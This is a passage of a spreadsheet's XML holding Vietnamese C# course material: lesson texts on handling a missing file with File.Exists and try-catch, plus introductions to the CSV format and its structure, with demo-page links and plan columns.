Do đó, kỹ thuật tốt nhất là kết hợp cả hai: kiểm tra trước để xử lý các lỗi thông thường, và sử dụng try-catch để bắt các trường hợp ngoại lệ phát sinh ngoài ý muốn.
Lưu ý quan trọng: Đừng bao giờ dựa hoàn toàn vào việc bắt ngoại lệ (try-catch) để thay thế cho logic kiểm tra dữ liệu đầu vào. Hãy dùng try-catch như một lớp phòng thủ cuối cùng (fail-safe) cho những tình huống không thể lường trước được.
Ví dụ mẫu: Xử lý file cấu hình
Giả sử bạn đang viết một ứng dụng cần đọc file cấu hình (config.json). Nếu file không tồn tại, thay vì để ứng dụng crash, chúng ta sẽ thông báo cho người dùng và thiết lập giá trị mặc định.
using System;
using System.IO;
public class ConfigLoader
{
    public string LoadConfig(string filePath)
    {
        try
        {
            if (!File.Exists(filePath))
            {
                throw new FileNotFoundException("File cấu hình không tồn tại!", filePath);
            }
            return File.ReadAllText(filePath);
        }
        catch (FileNotFoundException ex)
        {
            Console.WriteLine($"Cảnh báo: {ex.Message}");
            return "DEFAULT_CONFIG_VALUES";
        }
        catch (UnauthorizedAccessException)
        {
            Console.WriteLine("Lỗi: Bạn không có quyền truy cập file này.");
            return null;
        }
        catch (Exception ex)
        {
            Console.WriteLine($"Đã xảy ra lỗi không xác định: {ex.Message}");
            return null;
        }
    }
}
Các điểm cần lưu ý khi thiết kế luồng xử lý lỗi
Thông báo thân thiện: Thay vì hiển thị mã lỗi kỹ thuật như "System.IO.FileNotFoundException", hãy cung cấp thông báo rõ ràng cho người dùng cuối, ví dụ: "Không tìm thấy file lưu trữ, vui lòng kiểm tra lại đường dẫn."
Ghi log (Logging): Trong khi thông báo cho người dùng cần sự đơn giản, bạn nên ghi lại chi tiết ngoại lệ (stack trace) vào một file log riêng để phục vụ việc bảo trì và sửa lỗi sau này.
Đường dẫn tương đối vs Tuyệt đối: Rất nhiều lỗi "file không tồn tại" xảy ra do hiểu lầm về thư mục làm việc hiện tại (Current Working Directory). Hãy cân nhắc sử dụng Path.Combine kết hợp với AppDomain.CurrentDomain.BaseDirectory để xác định đường dẫn chính xác của file thay vì đường dẫn tương đối dễ gây nhầm lẫn.
Việc làm chủ cách xử lý các file bị thiếu là bước đầu tiên để xây dựng một ứng dụng C# có độ tin cậy cao, đảm bảo rằng ngay cả khi dữ liệu đầu vào không hoàn hảo, ứng dụng của bạn vẫn vận hành một cách bền bỉ và chuyên nghiệp.</t>
        </is>
      </c>
      <c r="W44" s="22" t="inlineStr">
        <is>
          <t># Xử lý lỗi khi file không tồn tại
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích vì sao không nên giả định rằng tệp luôn tồn tại.
- Viết đoạn code kiểm tra bằng `File.Exists` trước khi đọc.
- Viết đoạn code bắt `FileNotFoundException` bằng `try-catch`.
- So sánh hai cách và nêu lý do nên kết hợp cả hai (hiện tượng race condition).
- Quan sát hai cách chạy song song trong hai trường hợp tệp có và không có bằng hoạt động mô phỏng.
## Vì sao cần xử lý tệp không tồn tại
Tệp nằm trên hệ thống tệp, một tài nguyên **bên ngoài** chương trình (external resource). Người dùng có thể xóa tệp, di chuyển thư mục, hoặc chính bạn gõ sai đường dẫn. Nếu code cứ giả định "tệp luôn có", chương trình sẽ dừng đột ngột khi tệp vắng mặt.
Khi đọc một tệp không có bằng `File.ReadAllText` hay `StreamReader`, .NET ném `FileNotFoundException`. Nếu thư mục cha trong đường dẫn không có, lỗi sẽ là `DirectoryNotFoundException`. Ta có hai cách đối phó.
## Cách 1: kiểm tra trước bằng File.Exists
Hỏi trước "tệp có không?", chỉ đọc khi câu trả lời là có. Chương trình tự quyết định cách báo, và **không có exception nào** được ném.
```csharp
using System;
using System.IO;
public class Program
{
    public static void Main()
    {
        if (File.Exists("data.txt"))
        {
            var s = File.ReadAllText("data.txt");
            Console.WriteLine(s);                       // Xin chào (khi data.txt có nội dung "Xin chào")
        }
        else
        {
            Console.WriteLine("Không tìm thấy tệp");    // khi không có data.txt
        }
    }
}
```
Cách này rõ ràng, dễ đọc, và nhẹ hơn khi tệp thường xuyên vắng mặt, vì không phải tạo exception.
## Cách 2: bắt exception bằng try-catch
Cứ đọc luôn. Nếu tệp không có, `FileNotFoundException` được ném và `catch` bắt lại.
```csharp
try
{
    var s = File.ReadAllText("data.txt");
    Console.WriteLine(s);
}
catch (FileNotFoundException)
{
    Console.WriteLine("Không tìm thấy tệp");
}
```
Chương trình không dừng vì lỗi đã được bắt, và thông điệp in ra giống cách 1.
## So sánh hai cách
| | Kiểm tra trước | Bắt exception |
|---|---|---|
| Cách làm | `if (File.Exists(...))` rồi mới đọc | Cứ đọc, có lỗi thì `catch` |
| Khi tệp có | Đọc và in nội dung | Đọc và in nội dung, `catch` không chạy |
| Khi tệp không có | Nhánh `else`, **không ném lỗi** | Ném `FileNotFoundException`, `catch` bắt |
| Ưu điểm | Code rõ ràng, tránh exception | Bao quát cả lỗi bất ngờ |
## Vì sao nên kết hợp cả hai
Giữa lúc `File.Exists` trả về `true` và lúc bạn thực sự mở tệp, tệp vẫn có thể bị xóa bởi một tiến trình khác. Hiện tượng này gọi là **race condition**. Vì thế `File.Exists` một mình chưa đủ an toàn.
Cách tốt: **kiểm tra trước** cho trường hợp thường gặp, và **`try-catch` làm lớp bảo vệ cuối** cho tình huống bất ngờ. Ví dụ đọc tệp cấu hình, nếu thiếu thì dùng giá trị mặc định:
```csharp
using System;
using System.IO;
public class ConfigLoader
{
    public string LoadConfig(string filePath)
    {
        if (!File.Exists(filePath))
        {
            Console.WriteLine("Cảnh báo: không có tệp cấu hình, dùng giá trị mặc định.");
            return "DEFAULT_CONFIG_VALUES";
        }
        try
        {
            return File.ReadAllText(filePath);
        }
        catch (FileNotFoundException)
        {
            // tệp bị xóa ngay sau khi kiểm tra
            return "DEFAULT_CONFIG_VALUES";
        }
        catch (UnauthorizedAccessException)
        {
            Console.WriteLine("Lỗi: không có quyền truy cập tệp này.");
            return "DEFAULT_CONFIG_VALUES";
        }
    }
}
```
## Hoạt động: Hai cách đọc cùng một tệp
Mô phỏng dưới đây có hai cột. Cột trái là cách "Kiểm tra trước", cột phải là cách "Bắt exception". Cả hai cùng đọc `data.txt`. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để hai cột chạy cùng lúc:
- Mở tab **Tệp có tồn tại**. Thư mục có `data.txt` chứa "Xin chào". Cột trái: `Exists?` trả về `true`, rồi đọc và in. Cột phải: `ReadAllText` đọc thẳng, không ném lỗi, trạm `catch` không chạy. Cả hai cột đều in "Xin chào".
- Mở tab **Tệp không tồn tại**. Thư mục không có `data.txt` (hiện "không có"). Cột trái: `Exists?` trả về `false`, bỏ qua bước đọc và vào nhánh `else`, không có exception nào. Cột phải: `ReadAllText` ném `FileNotFoundException` (thẻ đỏ), rồi `catch` bắt lại. Cả hai cột đều in "Không tìm thấy tệp".
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/xu-ly-loi-va-tai-nguyen-trong-file-i-o/xu-ly-loi-khi-file-khong-ton-tai/" title="Xử lý lỗi khi file không tồn tại" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: khi tệp có thật, hai cách cho kết quả giống nhau. Khi tệp không có, cả hai cùng báo "Không tìm thấy tệp", nhưng cách đầu tránh được lỗi còn cách sau để lỗi xảy ra rồi bắt. Kiểm tra trước cho code rõ ràng, nhưng vẫn nên có `try-catch` vì tệp có thể bị xóa ngay sau khi kiểm tra.
## Lưu ý khi thiết kế xử lý lỗi
- **Thông báo thân thiện:** nói "Không tìm thấy tệp lưu trữ, hãy kiểm tra lại đường dẫn" thay vì in tên exception kỹ thuật.
- **Ghi nhật ký (log):** lưu chi tiết lỗi vào tệp log để dễ tìm nguyên nhân sau này.
- **Đường dẫn tương đối:** nhiều lỗi "không tìm thấy tệp" do hiểu sai **thư mục làm việc hiện tại** (current working directory). Với tệp đi kèm chương trình, hãy ghép đường dẫn từ `AppContext.BaseDirectory` bằng `Path.Combine`.
- Đừng dùng `try-catch` thay cho việc kiểm tra đầu vào thông thường. Hãy xem nó là lớp phòng thủ cuối cùng.
## Tóm tắt
- Tệp là tài nguyên bên ngoài, có thể vắng mặt bất cứ lúc nào.
- `File.Exists` giúp kiểm tra trước và tránh ném exception.
- `try-catch (FileNotFoundException)` bắt lỗi khi tệp không có, và chương trình không dừng.
- Giữa lúc kiểm tra và lúc đọc, tệp vẫn có thể bị xóa (race condition).
- Cách tốt nhất: kiểm tra trước cho trường hợp thường gặp, `try-catch` cho trường hợp bất ngờ.</t>
        </is>
      </c>
    </row>
    <row r="45" ht="409.6" customHeight="1" s="18">
      <c r="A45" s="10" t="n">
        <v>45</v>
      </c>
      <c r="B45" s="10" t="inlineStr">
        <is>
          <t>5. Làm việc với Dữ liệu có Cấu trúc (CSV)</t>
        </is>
      </c>
      <c r="C45" s="10" t="inlineStr">
        <is>
          <t>Giới thiệu về CSV và Cấu trúc cơ bản</t>
        </is>
      </c>
      <c r="D45" s="10" t="inlineStr">
        <is>
          <t>CSV là gì và tại sao lại quan trọng?</t>
        </is>
      </c>
      <c r="E45" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F45" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G45" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H45" s="10" t="inlineStr">
        <is>
          <t>Thấy bảng tính và tệp CSV là hai cách nhìn của cùng một dữ liệu.</t>
        </is>
      </c>
      <c r="I45" s="10" t="inlineStr">
        <is>
          <t>1 cột (hai khung hình minh họa cạnh nhau)</t>
        </is>
      </c>
      <c r="J45" s="10" t="inlineStr">
        <is>
          <t>Trái: bảng kiểu Excel (lưới ô, hàng tiêu đề đậm). Phải: văn bản CSV thô. Mỗi bước tô cùng màu một hàng ở hai bên; dấu phẩy được tô như đường kẻ ô.</t>
        </is>
      </c>
      <c r="K45" s="10" t="inlineStr">
        <is>
          <t>H16</t>
        </is>
      </c>
      <c r="L45" s="10" t="inlineStr">
        <is>
          <t>1 tab</t>
        </is>
      </c>
      <c r="M45" s="10" t="inlineStr">
        <is>
          <t>Hàng tiêu đề Ma | Ten | Gia ↔ dòng 1 "Ma,Ten,Gia".
Bản ghi 1 ↔ "SP01,Bút bi,5000" (dấu phẩy = ranh giới cột).
Bản ghi 2 ↔ "SP02,Vở,12000".
Bản ghi 3 ↔ "SP03,Thước,8000".
Xong: mở bằng Notepad thấy văn bản, mở bằng Excel thấy bảng.</t>
        </is>
      </c>
      <c r="N45" s="10" t="inlineStr">
        <is>
          <t>Ma,Ten,Gia / SP01,Bút bi,5000 / SP02,Vở,12000 / SP03,Thước,8000</t>
        </is>
      </c>
      <c r="O45" s="10" t="inlineStr">
        <is>
          <t>CSV là văn bản thuần: mỗi dòng một bản ghi, dấu phẩy ngăn cách trường; người, Excel và chương trình đều đọc được.</t>
        </is>
      </c>
      <c r="P45" s="10" t="n"/>
      <c r="Q45" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/lam-viec-voi-du-lieu-co-cau-truc-csv/gioi-thieu-ve-csv-va-cau-truc-co-ban/csv-la-gi-va-tai-sao-lai-quan-trong/index.html</t>
        </is>
      </c>
      <c r="R45" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/lam-viec-voi-du-lieu-co-cau-truc-csv/gioi-thieu-ve-csv-va-cau-truc-co-ban/csv-la-gi-va-tai-sao-lai-quan-trong/</t>
        </is>
      </c>
      <c r="S45" s="10" t="n"/>
      <c r="T45" s="12" t="n"/>
      <c r="U45" s="12" t="n"/>
      <c r="V45" s="21" t="inlineStr">
        <is>
          <t>CSV là gì?
CSV, viết tắt của Comma Separated Values (Các Giá trị Phân tách bằng Dấu phẩy), là một định dạng file văn bản đơn giản được sử dụng rộng rãi để lưu trữ dữ liệu dạng bảng (tabular data). Hãy hình dung một bảng tính Excel hoặc một bảng trong cơ sở dữ liệu: dữ liệu được tổ chức thành các hàng và cột. CSV là một cách để biểu diễn cấu trúc này bằng văn bản thuần túy.
Trong một file CSV, mỗi dòng (line) thường tương ứng với một bản ghi (record) hoặc một hàng dữ liệu, và các trường (field) trong bản ghi đó được phân tách bằng một ký tự cụ thể, phổ biến nhất là dấu phẩy (,). Vì là văn bản thuần túy, file CSV có thể dễ dàng được mở và đọc bằng bất kỳ trình soạn thảo văn bản nào, từ Notepad trên Windows đến VS Code hay Sublime Text.
Ví dụ cơ bản về dữ liệu CSV:
Tên,Tuổi,Thành phố
Nguyễn Văn A,30,Hà Nội
Trần Thị B,25,TP.HCM
Lê Văn C,35,Đà Nẵng
Trong ví dụ trên:
Dòng đầu tiên thường là dòng tiêu đề (header row), định nghĩa tên của các cột dữ liệu.
Mỗi dòng tiếp theo là một bản ghi dữ liệu.
Các giá trị trong mỗi dòng được phân tách bằng dấu phẩy.
Mặc dù tên gọi là "Comma Separated Values", nhưng trên thực tế, các file CSV có thể sử dụng các ký tự phân tách khác như dấu chấm phẩy (;), dấu tab (\t), hoặc thậm chí là dấu sổ đứng (|). Việc sử dụng ký tự phân tách nào phụ thuộc vào ngữ cảnh và quy ước của dữ liệu. Các quy tắc chi tiết hơn về cấu trúc file CSV, bao gồm các loại dấu phân cách và cách xử lý các trường hợp đặc biệt, sẽ được trình bày cụ thể trong bài học tiếp theo là "Cấu trúc cơ bản của File CSV".
Vai trò của CSV trong trao đổi dữ liệu
CSV đóng một vai trò cực kỳ quan trọng và phổ biến trong việc trao đổi dữ liệu giữa các hệ thống và ứng dụng khác nhau. Trong thế giới công nghệ thông tin ngày nay, các hệ thống thường được xây dựng bằng nhiều ngôn ngữ lập trình, sử dụng các loại cơ sở dữ liệu khác nhau và chạy trên các nền tảng đa dạng. Việc các hệ thống này "nói chuyện" và chia sẻ dữ liệu với nhau là một yêu cầu thiết yếu.
Hãy xem xét một số kịch bản phổ biến:
Xuất/Nhập dữ liệu từ Bảng tính: Bạn làm việc với một file Excel chứa danh sách khách hàng và muốn đưa dữ liệu này vào một ứng dụng quản lý quan hệ khách hàng (CRM) mới. Hoặc ngược lại, bạn muốn xuất báo cáo từ CRM ra để phân tích trong Excel. CSV là cầu nối lý tưởng cho việc này.
Chuyển đổi dữ liệu giữa các hệ thống: Một hệ thống cũ lưu trữ dữ liệu nhân sự cần được di chuyển sang một hệ thống quản lý nhân sự (HRM) hiện đại hơn. Thay vì viết các bộ chuyển đổi phức tạp cho các định dạng riêng biệt, việc xuất dữ liệu từ hệ thống cũ ra CSV và nhập vào hệ thống mới là một phương pháp nhanh chóng và hiệu quả.
Tích hợp với các công cụ phân tích: Các công cụ phân tích dữ liệu lớn, machine learning, hay các nền tảng BI (Business Intelligence) thường có khả năng đọc và xử lý file CSV rất tốt. Dữ liệu thô từ các ứng dụng web, IoT (Internet of Things) có thể được xuất ra CSV để đưa vào các công cụ này.
File cấu hình hoặc nhật ký (log): Đôi khi, các ứng dụng sử dụng CSV để lưu trữ các thông số cấu hình đơn giản hoặc ghi lại các sự kiện nhật ký theo cấu trúc bảng.
Sự phổ biến của CSV đến từ tính đơn giản và khả năng tương thích cao, cho phép dữ liệu dễ dàng được chia sẻ mà không cần các phần mềm hoặc thư viện chuyên dụng phức tạp.
Ưu điểm của CSV
CSV đã tồn tại và phát triển mạnh mẽ trong nhiều thập kỷ nhờ vào những ưu điểm nổi bật sau:
Đơn giản và dễ đọc: Định dạng CSV là văn bản thuần túy, không chứa các thẻ định dạng phức tạp hay cấu trúc lồng nhau như XML hoặc JSON. Điều này giúp con người có thể dễ dàng đọc, hiểu và thậm chí chỉnh sửa thủ công một file CSV bằng bất kỳ trình soạn thảo văn bản nào.
Tương thích rộng: Hầu hết mọi ngôn ngữ lập trình (C#, Python, Java, JavaScript, v.v.), hệ điều hành, ứng dụng bảng tính (Microsoft Excel, Google Sheets, LibreOffice Calc) và cơ sở dữ liệu đều có khả năng đọc và ghi file CSV một cách dễ dàng. Đây là một định dạng "ngôn ngữ chung" cho dữ liệu.
Nhẹ và hiệu quả: So với các định dạng dữ liệu khác như XML hoặc JSON, file CSV thường có kích thước nhỏ hơn đáng kể khi lưu trữ cùng một lượng dữ liệu dạng bảng. Điều này giúp tiết kiệm không gian lưu trữ và giảm băng thông mạng khi truyền tải.
Dễ tạo và chỉnh sửa: Bạn có thể tạo một file CSV chỉ bằng cách gõ văn bản vào một trình soạn thảo và lưu với đuôi .csv. Việc chỉnh sửa cũng rất trực quan. Đối với lập trình viên, việc tạo ra một chuỗi CSV từ dữ liệu trong bộ nhớ hoặc phân tích một chuỗi CSV thành các đối tượng là một tác vụ tương đối đơn giản.
Nhược điểm của CSV
Mặc dù có nhiều ưu điểm, CSV không phải là giải pháp hoàn hảo cho mọi tình huống và tồn tại một số nhược điểm cần lưu ý:
Không có schema rõ ràng: CSV không có cơ chế tích hợp để định nghĩa cấu trúc dữ liệu (schema). Nó không quy định loại dữ liệu của từng cột (ví dụ: cột Tuổi là số nguyên, cột Ngày sinh là ngày tháng), hay ràng buộc về độ dài, giá trị hợp lệ. Điều này có nghĩa là ứng dụng đọc file CSV phải tự mình "biết" hoặc suy luận ra cấu trúc và kiểu dữ liệu mong đợi, dẫn đến tiềm ẩn lỗi nếu file CSV không đúng định dạng.
Dễ lỗi với dữ liệu phức tạp: Đây là nhược điểm lớn nhất. Nếu một trường dữ liệu chứa ký tự phân cách (ví dụ: dấu phẩy trong địa chỉ "123 Đường Nguyễn Trãi, Phường 1"), hoặc chứa dấu xuống dòng, hoặc chính dấu nháy kép, thì file CSV có thể bị hiểu sai. Để xử lý các trường hợp này, các quy tắc đặc biệt về dấu nháy kép (") được áp dụng (như gói trường dữ liệu trong dấu nháy kép và thoát các dấu nháy kép bên trong bằng cách lặp lại chúng). Tuy nhiên, việc này làm tăng độ phức tạp khi đọc và ghi, và nếu không tuân thủ đúng quy tắc, sẽ dẫn đến lỗi phân tích dữ liệu.
Không phù hợp cho dữ liệu phân cấp: CSV chỉ tốt cho dữ liệu dạng bảng phẳng (flat tabular data). Nó không thể biểu diễn một cách tự nhiên các mối quan hệ phức tạp hơn, dữ liệu lồng nhau hoặc phân cấp (ví dụ: một đơn đặt hàng có nhiều mặt hàng, mỗi mặt hàng lại có các thuộc tính riêng). Đối với các cấu trúc dữ liệu như vậy, các định dạng như XML hoặc JSON sẽ phù hợp hơn.
Thiếu khả năng kiểm tra lỗi tích hợp: CSV không có cơ chế kiểm tra tính toàn vẹn của dữ liệu hoặc phát hiện lỗi cú pháp. Nếu một file CSV bị hỏng hoặc định dạng sai, việc xử lý nó có thể dẫn đến lỗi chương trình hoặc dữ liệu không chính xác mà không có cảnh báo rõ ràng từ bản thân định dạng.
Tóm lại, CSV là một công cụ mạnh mẽ và linh hoạt cho việc trao đổi dữ liệu dạng bảng đơn giản. Tuy nhiên, việc sử dụng nó đòi hỏi sự cẩn trọng và hiểu biết về các quy tắc xử lý dữ liệu phức tạp để tránh các lỗi tiềm ẩn.</t>
        </is>
      </c>
      <c r="W45" s="22" t="inlineStr">
        <is>
          <t># CSV là gì và tại sao lại quan trọng?
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích CSV là gì và nó lưu dữ liệu dạng bảng ra sao.
- Nhận ra hàng tiêu đề, bản ghi và dấu phẩy trong một tệp CSV.
- Nêu vai trò của CSV khi trao đổi dữ liệu giữa các hệ thống.
- Kể ra ưu điểm và nhược điểm chính của CSV.
- Quan sát bảng và tệp CSV là hai cách nhìn của cùng một dữ liệu bằng hoạt động mô phỏng.
## CSV là gì
**CSV** (Comma-Separated Values, giá trị phân tách bằng dấu phẩy) là định dạng **tệp văn bản thuần** để lưu **dữ liệu dạng bảng** (tabular data), tức dữ liệu tổ chức thành hàng và cột.
Trong một tệp CSV:
- Mỗi **dòng** là một **bản ghi** (record), tương ứng một hàng của bảng.
- Các giá trị trong một dòng gọi là **trường** (field), được ngăn cách bằng **dấu phẩy**.
- Dòng đầu thường là **hàng tiêu đề** (header), ghi tên các cột.
Ví dụ tệp `sp.csv` lưu danh sách sản phẩm:
```
Ma,Ten,Gia
SP01,Bút bi,5000
SP02,Vở,12000
SP03,Thước,8000
```
Đây là bảng có ba cột (`Ma`, `Ten`, `Gia`) và ba bản ghi. Vì chỉ là văn bản thuần, bạn mở được tệp bằng bất kỳ trình soạn thảo nào, từ Notepad đến VS Code.
Dù tên gọi có chữ "dấu phẩy", thực tế nhiều tệp dùng dấu phân cách khác như dấu chấm phẩy (`;`), dấu tab hay dấu `|`. Cấu trúc chi tiết sẽ học ở bài sau.
## Vai trò của CSV
Các hệ thống phần mềm được viết bằng nhiều ngôn ngữ, dùng nhiều loại cơ sở dữ liệu, và vẫn cần chia sẻ dữ liệu cho nhau. CSV là "ngôn ngữ chung" đơn giản cho việc đó:
- **Xuất và nhập từ bảng tính:** chuyển danh sách khách hàng giữa phần mềm bảng tính và ứng dụng quản lý.
- **Di chuyển dữ liệu giữa hệ thống:** xuất từ hệ thống cũ ra CSV rồi nhập vào hệ thống mới, không cần viết bộ chuyển đổi phức tạp.
- **Đưa vào công cụ phân tích:** nhiều công cụ phân tích dữ liệu và báo cáo đọc CSV rất tốt.
- **Nhật ký (log) hoặc cấu hình đơn giản:** ghi sự kiện theo từng dòng.
## Ưu điểm của CSV
- **Đơn giản, dễ đọc:** người đọc hiểu ngay, thậm chí sửa tay được.
- **Tương thích rộng:** gần như mọi ngôn ngữ lập trình, hệ điều hành, phần mềm bảng tính và cơ sở dữ liệu đều đọc và ghi được CSV.
- **Nhẹ:** không có thẻ hay cấu trúc lồng nhau như XML hay JSON, nên tệp thường nhỏ hơn với cùng dữ liệu dạng bảng.
- **Dễ tạo:** gõ văn bản rồi lưu đuôi `.csv`, hoặc dùng code tạo từng dòng.
## Nhược điểm của CSV
- **Không có schema:** CSV không nói cột nào là số, ngày hay chuỗi. Mọi giá trị đều là văn bản, chương trình đọc phải tự biết và tự chuyển kiểu.
- **Dữ liệu phức tạp dễ sai:** nếu một trường chứa dấu phẩy (như địa chỉ "123 Nguyễn Trãi, Phường 1"), dấu xuống dòng hay dấu nháy kép, ta phải dùng thêm quy tắc dấu nháy kép (`"`). Làm sai quy tắc thì dữ liệu bị hiểu sai.
- **Không hợp dữ liệu phân cấp:** CSV chỉ biểu diễn bảng phẳng. Một đơn hàng có nhiều mặt hàng lồng bên trong hợp với JSON hoặc XML hơn.
- **Ít kiểm tra lỗi:** định dạng không tự phát hiện tệp hỏng hay sai cột.
## Khi nào nên chọn CSV
| Tình huống | Gợi ý |
|---|---|
| Danh sách phẳng: sản phẩm, khách hàng, giao dịch | CSV rất phù hợp |
| Cần mở bằng phần mềm bảng tính hoặc gửi cho người không biết lập trình | CSV |
| Dữ liệu lồng nhau (đơn hàng chứa nhiều mặt hàng) | JSON hoặc XML |
| Cần ràng buộc kiểu dữ liệu chặt chẽ | Cơ sở dữ liệu hoặc định dạng có schema |
Quy tắc đơn giản: nếu dữ liệu của bạn nhìn giống một bảng, CSV thường là lựa chọn nhanh và gọn.
## Hoạt động: Bảng và CSV là một
Mô phỏng dưới đây đặt hai cách nhìn cạnh nhau. Hãy thao tác bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Bảng và CSV**. Cột trái là "Bảng kiểu Excel", cột phải là "Tệp văn bản CSV", cùng một dữ liệu. Ở bước đầu, hàng tiêu đề (`Ma`, `Ten`, `Gia`) sáng lên ở cả hai bên, bên phải là dòng `Ma,Ten,Gia`.
- Tiếp tục bấm: lần lượt hàng 1, 2, 3 được tô sáng, tương ứng các dòng `SP01,Bút bi,5000`, `SP02,Vở,12000` và `SP03,Thước,8000`. Ở bên phải, dấu phẩy sáng lên màu riêng, đó chính là ranh giới giữa các cột.
- Bước cuối, toàn bộ dữ liệu chuyển sang màu xanh. Mở bằng trình soạn thảo thấy văn bản thuần, mở bằng phần mềm bảng tính thấy bảng, nhưng dữ liệu vẫn là một.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/lam-viec-voi-du-lieu-co-cau-truc-csv/gioi-thieu-ve-csv-va-cau-truc-co-ban/csv-la-gi-va-tai-sao-lai-quan-trong/" title="CSV là gì?" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: CSV là văn bản thuần, mỗi dòng một bản ghi, dấu phẩy ngăn cách các trường. Con người, phần mềm bảng tính và chương trình C# đều đọc được cùng một tệp.
## Tóm tắt
- CSV là tệp văn bản thuần lưu dữ liệu dạng bảng: mỗi dòng một bản ghi, dấu phẩy ngăn cách các trường.
- Dòng đầu thường là hàng tiêu đề ghi tên cột.
- CSV là cầu nối phổ biến để trao đổi dữ liệu giữa các hệ thống.
- Ưu điểm: đơn giản, tương thích rộng, nhẹ, dễ tạo.
- Nhược điểm: không có schema, dễ sai với dữ liệu phức tạp, không hợp dữ liệu phân cấp.</t>
        </is>
      </c>
    </row>
    <row r="46" ht="409.6" customHeight="1" s="18">
      <c r="A46" s="10" t="n">
        <v>46</v>
      </c>
      <c r="B46" s="10" t="inlineStr">
        <is>
          <t>5. Làm việc với Dữ liệu có Cấu trúc (CSV)</t>
        </is>
      </c>
      <c r="C46" s="10" t="inlineStr">
        <is>
          <t>Giới thiệu về CSV và Cấu trúc cơ bản</t>
        </is>
      </c>
      <c r="D46" s="10" t="inlineStr">
        <is>
          <t>Cấu trúc cơ bản của File CSV</t>
        </is>
      </c>
      <c r="E46" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F46" s="13" t="inlineStr">
        <is>
          <t>Làm thêm nếu muốn</t>
        </is>
      </c>
      <c r="G46" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H46" s="10" t="inlineStr">
        <is>
          <t>Gọi đúng tên từng thành phần của tệp CSV.</t>
        </is>
      </c>
      <c r="I46" s="10" t="inlineStr">
        <is>
          <t>1 cột</t>
        </is>
      </c>
      <c r="J46" s="10" t="inlineStr">
        <is>
          <t>Văn bản CSV với các nhãn chú thích bật lên chỉ vào từng phần: Hàng tiêu đề, Bản ghi, Trường, Dấu phân cách, Ký tự xuống dòng (↵), Trường rỗng (,,).</t>
        </is>
      </c>
      <c r="K46" s="10" t="inlineStr">
        <is>
          <t>H16</t>
        </is>
      </c>
      <c r="L46" s="10" t="inlineStr">
        <is>
          <t>1 tab</t>
        </is>
      </c>
      <c r="M46" s="10" t="inlineStr">
        <is>
          <t>Nhãn 'Hàng tiêu đề'.
Nhãn 'Bản ghi' (một dòng).
Nhãn 'Trường' (một giá trị).
Nhãn 'Dấu phân cách' (dấu phẩy).
Nhãn 'Trường rỗng': SP04,,3000 (thiếu tên).
Nhãn 'Xuống dòng' ↵. Xong: ghi chú một số vùng (như Việt Nam) Excel xuất CSV dùng dấu ';'.</t>
        </is>
      </c>
      <c r="N46" s="10" t="inlineStr">
        <is>
          <t>Như bài trước, thêm SP04,,3000</t>
        </is>
      </c>
      <c r="O46" s="10" t="inlineStr">
        <is>
          <t>Hiểu đúng tên gọi giúp đọc tài liệu và viết code xử lý CSV chính xác.</t>
        </is>
      </c>
      <c r="P46" s="10" t="inlineStr">
        <is>
          <t>Excel ở vùng dùng dấu phẩy làm dấu thập phân thường xuất CSV với dấu ';'.</t>
        </is>
      </c>
      <c r="Q46" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/lam-viec-voi-du-lieu-co-cau-truc-csv/gioi-thieu-ve-csv-va-cau-truc-co-ban/cau-truc-co-ban-cua-file-csv/index.html</t>
        </is>
      </c>
      <c r="R46" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/lam-viec-voi-du-lieu-co-cau-truc-csv/gioi-thieu-ve-csv-va-cau-truc-co-ban/cau-truc-co-ban-cua-file-csv/</t>
        </is>
      </c>
      <c r="S46" s="10" t="n"/>
      <c r="T46" s="12" t="n"/>
      <c r="U46" s="12" t="n"/>
      <c r="V46" s="21" t="inlineStr">
        <is>
          <t>Thành phần cơ bản của File CSV: Dòng và Trường
Trong bài đọc trước, chúng ta đã tìm hiểu về định nghĩa và tầm quan trọng của file CSV. Giờ đây, chúng ta sẽ đi sâu vào cấu trúc bên trong của nó. Hãy hình dung một file CSV như một bảng dữ liệu đơn giản, nơi mọi thông tin được tổ chức một cách tuần tự. Cấu trúc này được xây dựng từ hai thành phần chính: dòng (record) và trường (field).
Dòng (Record): Mỗi dòng trong file CSV đại diện cho một bản ghi hoặc một hàng dữ liệu hoàn chỉnh. Giống như mỗi hàng trong một bảng tính Excel chứa thông tin đầy đủ về một đối tượng (ví dụ: một khách hàng, một sản phẩm, một giao dịch), mỗi dòng trong CSV cũng vậy. Các dòng được phân tách bằng ký tự xuống dòng (new line character), thường là \n hoặc \r\n tùy thuộc vào hệ điều hành.
Trường (Field): Trong mỗi dòng, dữ liệu được chia thành các trường. Mỗi trường đại diện cho một đơn vị dữ liệu cụ thể hoặc một cột trong bản ghi. Ví dụ, trong một bản ghi về khách hàng, các trường có thể là "Tên", "Email", "Số điện thoại". Các trường trong cùng một dòng được phân tách bằng một ký tự đặc biệt gọi là dấu phân cách (delimiter).
Hãy xem xét ví dụ đơn giản này:
Alice,alice@example.com,Hà Nội
Bob,bob@example.com,TP.HCM
Trong ví dụ trên:
Có hai dòng dữ liệu.
Mỗi dòng có ba trường: tên, email và thành phố.
Dấu phẩy (,) là dấu phân cách giữa các trường.
Dấu phân cách (Delimiter): "Chất keo" kết nối các trường
